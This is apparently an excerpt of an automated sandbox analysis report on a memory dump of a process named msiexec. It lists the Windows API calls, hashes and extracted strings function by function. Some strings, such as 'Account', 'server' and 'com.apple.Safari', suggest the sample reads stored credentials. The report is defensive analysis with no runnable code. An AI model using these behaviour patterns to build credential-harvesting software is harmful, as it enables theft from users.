                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3655998216-0
                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1828521557-0
                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 609303285-0
                                                                                                          • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                          • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 2081463915-0
                                                                                                          • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                          • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2136311172-0
                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1936579350-0
                                                                                                          • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                          • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free
                                                                                                          • String ID:
                                                                                                          • API String ID: 1294909896-0
                                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free
                                                                                                          • String ID:
                                                                                                          • API String ID: 1294909896-0
                                                                                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                          APIs
                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3604893535-0
                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                          • API String ID: 2780580303-317687271
                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                          APIs
                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1213725291-0
                                                                                                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                          • OpenClipboard.USER32(?), ref: 00411878
                                                                                                          • GetLastError.KERNEL32 ref: 0041188D
                                                                                                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                            • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                            • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 2628231878-0
                                                                                                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1865533344-0
                                                                                                          • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                          • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                          APIs
                                                                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Version
                                                                                                          • String ID:
                                                                                                          • API String ID: 1889659487-0
                                                                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                          APIs
                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NtdllProc_Window
                                                                                                          • String ID:
                                                                                                          • API String ID: 4255912815-0
                                                                                                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                          APIs
                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                          • API String ID: 577499730-1134094380
                                                                                                          • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                          • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                          Strings
                                                                                                          Memory Dump Source
